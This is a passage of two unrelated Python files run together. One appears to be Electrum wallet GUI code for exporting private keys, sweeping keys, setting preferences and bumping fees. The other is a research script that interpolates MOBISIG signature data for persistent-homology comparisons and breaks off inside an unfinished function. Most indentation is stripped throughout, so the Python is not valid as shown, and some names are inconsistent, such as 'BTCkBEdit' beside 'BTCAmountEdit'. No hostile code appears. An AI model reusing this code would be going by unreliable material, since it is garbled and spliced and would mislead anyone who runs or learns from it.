parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str, Transaction
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
# transactions are binary, but qrcode seems to return utf8...
data = data.decode('utf8')
z = bitcoin.base_decode(data, length=None, base=43)
        data = bh2u(z)
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
def privkeys_thread():
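            # Runs on a worker thread: derive each private key and report progress to
            # the dialog through the computing_privkeys / show_privkeys signals.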
for addr in addresses:
time.sleep(0.1)
if done:
break
private_keys[addr] = "\n".join(self.wallet.get_private_key(addr, password))
d.emit(SIGNAL('computing_privkeys'))
d.emit(SIGNAL('show_privkeys'))
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
d.connect(d, QtCore.SIGNAL('computing_privkeys'), lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
d.connect(d, QtCore.SIGNAL('show_privkeys'), show_privkeys)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
            with open(labelsFile, 'r') as f:
                data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
            if tx_hash:
                label = wallet.get_label(tx_hash)
            else:
                label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
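        # Ask for private keys and a destination address, then build a transaction
        # sweeping the keys' funds to that address for review and broadcast.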
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = QTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet(BLACK_FG if get_address() else RED_FG)
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
try:
tx = self.wallet.sweep(get_pk(), self.network, self.config, get_address(), None)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
self.show_transaction(tx)
def _do_import(self, title, msg, func):
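        # Generic import helper: apply func to each whitespace-separated key entered
        # in a text dialog and report which entries were added and which failed.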
text = text_dialog(self, title, msg + ' :', _('Import'))
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
            index = list(languages.keys()).index(self.config.get("language", ''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
update_maxfee()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
def on_maxfee(x):
m = maxfee_e.get_amount()
if m: self.config.set_key('max_fee_rate', m)
self.fee_slider.update()
def update_maxfee():
d = self.config.is_dynfee()
maxfee_e.setDisabled(d)
maxfee_label.setDisabled(d)
maxfee_label = HelpLabel(_('Max static fee'), _('Max value of the static fee slider'))
maxfee_e = BTCkBEdit(self.get_decimal_point)
maxfee_e.setAmount(self.config.max_fee_rate())
maxfee_e.textChanged.connect(on_maxfee)
update_maxfee()
fee_widgets.append((maxfee_label, maxfee_e))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
rbf_policy = self.config.get('rbf_policy', 1)
rbf_label = HelpLabel(_('Propose Replace-By-Fee') + ':', '')
rbf_combo = QComboBox()
rbf_combo.addItems([_('Always'), _('If the fee is low'), _('Never')])
rbf_combo.setCurrentIndex(rbf_policy)
def on_rbf(x):
self.config.set_key('rbf_policy', x)
rbf_combo.currentIndexChanged.connect(on_rbf)
fee_widgets.append((rbf_label, rbf_combo))
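        # OpenAlias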
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
else:
alias_e.setStyleSheet(RED_BG)
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.connect(self, SIGNAL('alias_received'), set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
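        # base unit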
units = ['BTC', 'mBTC', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1BTC=1000mBTC.\n' \
          + _('This setting affects the fields in the Send tab.')
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'BTC':
self.decimal_point = 8
elif unit_result == 'mBTC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(on_unit)
gui_widgets.append((unit_label, unit_combo))
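        # block explorer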
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
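        # video device for QR code scanning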
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
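        # change addresses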
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
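        # coin selection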
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.disconnect(self, SIGNAL('alias_received'), set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
cb.setEnabled(plugins.is_available(name, self.wallet))
cb.setChecked(p is not None and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(i+1,1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
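        # initial suggestion: the configured fee/kB applied to the combined size (in bytes) of parent and child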
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
        vbox.addWidget(QLabel(_('New fee') + ':'))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
|
pershom_exp_signatures.py
|
import os
import numpy as np
import random as rand
import pylab as py
import matplotlib.pyplot as plt
import scipy.interpolate
from matplotlib import cm
from lib import helper as hp
from lib.tda import sim_homology
from scipy.interpolate import Rbf, interp1d, interp2d
from typing import List, Set, Dict, Tuple, Optional
from multiprocessing import Process
def top_nat_neighbors(
path: str = "",
array: np.ndarray = np.empty(1),
columns: int = 88
) -> np.ndarray:
"""
Nearest neighbor interpolation.
Returns the original data with augmented nearest neighbors.
:param path: Path to the desired CSV-file.
:param column: Columns to be processed, beginning from the first.
:return:
"""
try:
if len(path) > 0:
data = hp.read_data(path, columns)
else:
data = array
    except ValueError:
        print("Could not read valid (x, y) data, skipping interpolation.")
        return np.empty((0, 2))
x, y = np.empty(0), np.empty(0)
for i in data:
if np.isfinite(i[0]) and np.isfinite(i[1]):
x = np.append(x, i[0])
y = np.append(y, i[1])
xx = np.linspace(np.min(x), np.max(x), len(x))
f = interp1d(x, y, kind="nearest")
new_data = []
for i in range(0, len(xx)):
new_data.append([xx[i], f(xx[i])])
new_data.append([x[i], y[i]])
return np.array(new_data)
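# A minimal usage sketch (the file path below is illustrative only, not a layout
# guaranteed by this module): densify one MOBISIG signature a few passes and plot
# the result with the matplotlib import above.
#
#   pts = top_nat_neighbors(path="data/MOBISIG/USER1/SIGN_GEN_1.csv", columns=2)
#   for _ in range(3):
#       pts = top_nat_neighbors(array=pts, columns=2)
#   plt.scatter(pts[:, 0], pts[:, 1], s=1)
#   plt.show()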
def proc_signatures(dir: str, delimiter: str = ",", iterations: int = 5):
"""
Processes the experiment for the signature dataset.
Insert the directory to the MOBISID dataset: https://ms.sapientia.ro/~manyi/mobisig.html.
:param dir: Path to the directory.
:param delimiter: Delimiter used to save the csv file.
:proc: Directory.
"""
subdirectories = os.listdir(dir)
for user_folder in subdirectories:
if "USER" in user_folder:
path = os.path.abspath(dir + "/" + user_folder)
filepaths = os.listdir(path)
for file in filepaths:
temp_data = top_nat_neighbors(
path=dir + "/" + user_folder + "/" + file, columns=2
)
for j in range(0, iterations):
temp_data = top_nat_neighbors(array=temp_data, columns=2)
np.savetxt(
dir
+ "/"
+ "natneighbor"
+ "/"
+ user_folder
+ "/"
+ "it_"
+ str(j)
+ "_"
+ file,
temp_data,
delimiter=delimiter,
)
def create_distance_file(
orig_path: str,
interpol_path: str,
savefile: bool = True,
type: ["wasserstein", "bottleneck"] = "wasserstein",
filtration: ["alpha", "rips", "witness"] = "rips",
amount_of_files: int = 100
) -> None:
"""
    Creates, from two directories with correspondingly named CSV files, a persistence-distance comparison.
    This code relies on the naming of the directories.
    The expected structure is MOBISIG/USERX/file.csv and MOBISIG_natneighbor/USERX/file.csv so that the rows of the result CSV are named sensibly.
    :param orig_path: Path to the original MOBISIG files.
    :param interpol_path: Path to the interpolated MOBISIG files.
    :param savefile: Whether to additionally save the distances into a file (npy format).
    :param type: Distance to compute, either "wasserstein" or "bottleneck".
    :param filtration: Filtration to use: "alpha", "rips" or "witness".
    :param amount_of_files: Number of files to be processed.
    :return: None; each comparison is appended to results/<filtration>_<type>.csv.
"""
def diff(first, second):
"""
Computes the difference of two list objects.
:param first: First list.
:param second: Second list.
:return: List difference.
"""
second = set(second)
return [item for item in first if item not in second]
